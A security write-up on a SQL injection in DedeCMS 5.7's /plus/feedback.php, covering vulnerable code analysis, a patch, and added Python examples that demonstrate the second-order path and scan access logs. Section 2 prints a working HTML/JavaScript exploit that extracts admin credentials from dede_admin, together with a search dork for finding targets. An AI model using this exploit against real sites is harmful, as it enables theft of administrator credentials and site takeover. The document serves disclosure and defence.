
dedecms /plus/feedback.php SQL Injection Vul

Date: 2020-09-19 12:02:24


Contents

1. Vulnerability description
2. Trigger conditions
3. Affected versions
4. Vulnerable code analysis
5. Mitigation
6. Offense and defense considerations

1. Vulnerability description

1. In DedeCMS v5.7, plus\feedback.php does not correctly validate user-supplied input before building SQL from it, so the implementation contains an injection vulnerability.
2. An attacker can combine this with DedeCMS's variable-overwrite vulnerability to inject a webshell payload into the database.
3. In a second code path, an attacker can trigger a second-order injection.

Relevant Link:

/vuldb/ssvid-60549/NewsInfo/124/17697.Html/chengxuwenti/0504/47.html

2. Trigger conditions

0x1: POC

<html>
<head>
<title>DedeCms v5.7 feedback.php exp</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<script language='javascript'>
y = document.form1.addr.value;
function exploit(){
    var yanzhen = document.getElementById("yanzhen").value;
    var aid = document.getElementById("aid").value;
    var sqli = document.getElementById("sqli").value;
    document.form1.typeid.value = "0','3','4','5','0','1351739660', '0','0','0','0','0','aaaaaa'), ('" + aid +"','2',@`'`,'4','5','1','1351739660', '0','0','0','0','0',"+sqli+")#";
    document.form1.action = document.form1.addr.value + "/plus/feedback.php";
    document.form1.te.name = "action";
    document.form1.submit();
}
function getyanzhen(){
    var x = "<img src='"+ document.form1.addr.value +"/include/vdimgck.php' width='60' height='24' onclick=\"this.src=this.src+'?'\">";
    document.body.innerHTML+=x;
    document.form1.addr.value = y;
}
function look(){
    window.location.href = document.form1.addr.value+"/plus/feedback.php?aid="+document.getElementById("aid").value;
}
</script>
</head>
<body>
############################################################<br/>
DedeCms v5.7 feedback.php $typeid SQLi<br/>
Dork:inurl:plus/feedback.php?aid=<br/>
############################################################<br/><br/>
<form action="xxx" method="get" name="form1" target="_blank">
程序URL:<input type="text" id="addr" value="http://" /><br/>
验证码:<input type="text" name="validate" id="yanzhen" value=""/><br/>
存在的Aid:<input type="text" id="aid" value="1"/><br/>
SQL注入语句:<input type="text" id="sqli" value="(SELECT concat(uname,0x5f,pwd,0x5f) FROM `dede_admin`)" style="width:500px;"/><br/>
<input type="hidden" name="" id="te" value="send"/>
<input type="hidden" name="comtype" value="comments"/>
<input type="hidden" name="fid" value="1"/>
<input type="hidden" name="isconfirm" value="yes"/>
<input type="hidden" name="msg" value="90sec"/>
<input type="hidden" name="typeid" value=""/>
<input type="button" onclick="getyanzhen();" value="获取验证码">
<input type="button" onClick="exploit()" value="#Exploit#" />
<input type="button" onClick="look()" value="查看结果" /><br/>
</form>
</body>
</html>

Relevant Link:

http://www.oday.pw/WEBanquan/111312.html

3. Affected versions

<= dedecms 5.7

4. Vulnerable code analysis

\plus\feedback.php

..
//Save comment content
if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    if($msg!='')
    {
        //The $typeid variable is never initialised or normalised
        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)
            VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg(' 发表评论错误! ', '-1');
            //echo $dsql->GetError();
            exit();
        }
    }
}
//Quoted reply
elseif ($comtype == 'reply')
{
    $row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");
    //$row['arctitle'] read back from the database is not escaped, which allows a second-order injection
    $arctitle = $row['arctitle'];
    $aid =$row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg,2);
    $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
        VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}
..
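The second-order path deserves a concrete walk-through: `addslashes()` only protects the one statement it is applied to, the database stores the plain text, and the reply branch then pastes that plain text into a new INSERT. The following Python model is an added example, not code from the article or from DedeCMS. It uses an in-memory SQLite table whose columns are a subset of the article's INSERT (an assumption, not the real `dede_feedback` DDL), and because SQLite has no backslash escaping the `addslashes()` role is played by quote doubling. The title used contains nothing but an ordinary apostrophe, which is enough to show that the shipped reply branch is unsafe even for benign stored data, while the parameterised version handles it.

```python
import sqlite3

# Constructed table: the columns are a subset of those in the article's INSERT
# statement; it is an assumption, not the real dede_feedback DDL.
SCHEMA = """
CREATE TABLE feedback (
    id       INTEGER PRIMARY KEY AUTOINCREMENT,
    aid      INTEGER,
    typeid   INTEGER,
    arctitle TEXT,
    msg      TEXT
)
"""


def sql_escape(value: str) -> str:
    """Stand-in for PHP addslashes(): SQLite has no backslash escapes, so the
    single quote is doubled instead. The role is identical: the value is made
    safe for this one statement only, and the database stores the plain text."""
    return value.replace("'", "''")


def post_comment(db, aid, typeid, title, msg):
    """The `comments` branch: title and message are escaped before interpolation.
    aid/typeid are cast to int here (the article's fix for the first-order hole),
    because this example concentrates on the reply path."""
    sql = ("INSERT INTO feedback (aid, typeid, arctitle, msg) VALUES "
           f"({int(aid)}, {int(typeid)}, '{sql_escape(title)}', '{sql_escape(msg)}')")
    db.execute(sql)
    return db.execute("SELECT last_insert_rowid()").fetchone()[0]


def reply_vulnerable(db, fid, msg):
    """The `reply` branch as shipped: arctitle is read back from the table and
    pasted into the new INSERT without escaping (second-order injection point)."""
    row = db.execute("SELECT aid, typeid, arctitle FROM feedback WHERE id = ?",
                     (fid,)).fetchone()
    sql = ("INSERT INTO feedback (aid, typeid, arctitle, msg) VALUES "
           f"({row[0]}, {row[1]}, '{row[2]}', '{sql_escape(msg)}')")
    db.execute(sql)


def reply_fixed(db, fid, msg):
    """Hardened reply: every value, including the one that came out of the
    database, is bound as a parameter, so stored text never reaches the parser."""
    row = db.execute("SELECT aid, typeid, arctitle FROM feedback WHERE id = ?",
                     (fid,)).fetchone()
    db.execute("INSERT INTO feedback (aid, typeid, arctitle, msg) VALUES (?, ?, ?, ?)",
               (row[0], row[1], row[2], msg))


def demo():
    """Walk both reply paths over a title that contains an ordinary apostrophe."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    fid = post_comment(db, aid=1, typeid=0, title="O'Reilly's guide", msg="first")
    stored = db.execute("SELECT arctitle FROM feedback WHERE id = ?", (fid,)).fetchone()[0]
    try:
        reply_vulnerable(db, fid, "reply one")
        outcome = "accepted"
    except sqlite3.OperationalError:
        outcome = "syntax error"  # the stored quote terminated the string literal early
    reply_fixed(db, fid, "reply two")
    rows = db.execute("SELECT count(*) FROM feedback").fetchone()[0]
    return {"stored_title": stored, "vulnerable_reply": outcome, "rows": rows}


if __name__ == "__main__":
    print(demo())
```

The stored title comes back as `O'Reilly's guide`, the interpolating reply fails with a syntax error because the apostrophe closes the string literal, and the parameterised reply succeeds. The design point is that escaping belongs at the query boundary every time a value is placed into SQL, regardless of whether it came from the request or from an earlier row; binding parameters makes that property hold by construction instead of relying on every code path remembering `addslashes()`.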

Relevant Link:

/a/security/web/jbst//1103/11816.html

5. Mitigation

\plus\feedback.php

//Save comment content
if($comtype == 'comments')
{
    $arctitle = addslashes($title);
    /* Added normalisation and filtering logic */
    $typeid = intval($typeid);
    $ischeck = intval($ischeck);
    $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);
    /**/
    if($msg!='')
    {
        //The $typeid variable is never initialised or normalised
        $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)
            VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
        $rs = $dsql->ExecuteNoneQuery($inquery);
        if(!$rs)
        {
            ShowMsg(' 发表评论错误! ', '-1');
            //echo $dsql->GetError();
            exit();
        }
    }
}
//Quoted reply
elseif ($comtype == 'reply')
{
    $row = $dsql->GetOne("Select * from `#@__feedback` where id ='$fid'");
    //$row['arctitle'] read back from the database is not escaped, which allows a second-order injection
    $arctitle = $row['arctitle'];
    /* Added escaping logic */
    $arctitle = addslashes($row['arctitle']);
    /* */
    $aid =$row['aid'];
    $msg = $quotemsg.$msg;
    $msg = HtmlReplace($msg,2);
    $inquery = "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
        VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    $dsql->ExecuteNoneQuery($inquery);
}
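The patch above reduces `typeid`, `ischeck` and `feedbacktype` to the shapes the INSERT expects (integers and an alphanumeric token). The same rules make a usable detection check for sites that cannot patch immediately, or that want to find earlier probing in their logs. The scanner below is an added example, not part of the article or of DedeCMS: it parses constructed combined-format access log lines (sample data, not real traffic), picks out requests to `/plus/feedback.php`, and reports any request whose integer fields (`aid`, `typeid`, `fid`) or `feedbacktype` would not survive the patch's normalisation unchanged, or whose `comtype` is neither of the two branches the script handles. `fid` is included because the reply branch uses it as the row id in its lookup, so it has the same integer semantics.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access log lines (not real traffic). The third and
# fourth lines carry a stray quote in a field the fix requires to be an integer.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Sep/2020:12:02:24 +0800] "GET /plus/feedback.php?aid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Sep/2020:12:02:40 +0800] "GET /plus/feedback.php?action=send&comtype=comments&aid=12&typeid=3&msg=hello HTTP/1.1" 200 210 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Sep/2020:12:03:01 +0800] "GET /plus/feedback.php?action=send&comtype=comments&aid=1&typeid=0%27&msg=x HTTP/1.1" 200 210 "-" "curl/7.68.0"
198.51.100.9 - - [19/Sep/2020:12:03:05 +0800] "GET /plus/feedback.php?action=send&comtype=reply&fid=1%27&msg=x HTTP/1.1" 200 210 "-" "curl/7.68.0"
192.0.2.7 - - [19/Sep/2020:12:04:00 +0800] "GET /plus/list.php?tid=2 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

FEEDBACK_PATH = "/plus/feedback.php"
INTEGER_PARAMS = ("aid", "typeid", "fid")       # intval() in the fix
ALNUM_PARAMS = ("feedbacktype",)                 # preg_replace("#[^0-9a-z]#i") in the fix
ALLOWED_COMTYPE = {"comments", "reply"}          # the two branches feedback.php handles


def check_request(target: str) -> list:
    """Apply the normalisation rules of the patched feedback.php to a request
    target; every rule the raw request would fail becomes one finding."""
    parts = urlsplit(target)
    if parts.path != FEEDBACK_PATH:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # also %-decodes values
    findings = []
    for name in INTEGER_PARAMS:
        for value in params.get(name, []):
            if not re.fullmatch(r"\d+", value):
                findings.append(f"{name} is not a plain integer: {value!r}")
    for name in ALNUM_PARAMS:
        for value in params.get(name, []):
            if not re.fullmatch(r"[0-9a-zA-Z]*", value):
                findings.append(f"{name} contains non-alphanumeric characters: {value!r}")
    for value in params.get("comtype", []):
        if value not in ALLOWED_COMTYPE:
            findings.append(f"unexpected comtype: {value!r}")
    return findings


def scan_log(text: str) -> list:
    """Return (line number, client ip, findings) for every flagged request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = check_request(m.group("target"))
        if findings:
            hits.append((lineno, m.group("ip"), findings))
    return hits


if __name__ == "__main__":
    for lineno, ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: " + "; ".join(findings))
```

On the sample lines only the two requests from 198.51.100.9 are reported. One caveat: access logs only show parameters sent in the query string. The proof-of-concept form in section 2 submits with `method="get"`, so its requests are visible here, but a client sending the same fields in a POST body leaves no trace in a standard access log; for that case the same rules need to run in a WAF or in request-body logging in front of the application.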

6. Offense and defense considerations

Copyright (c) LittleHann All rights reserved
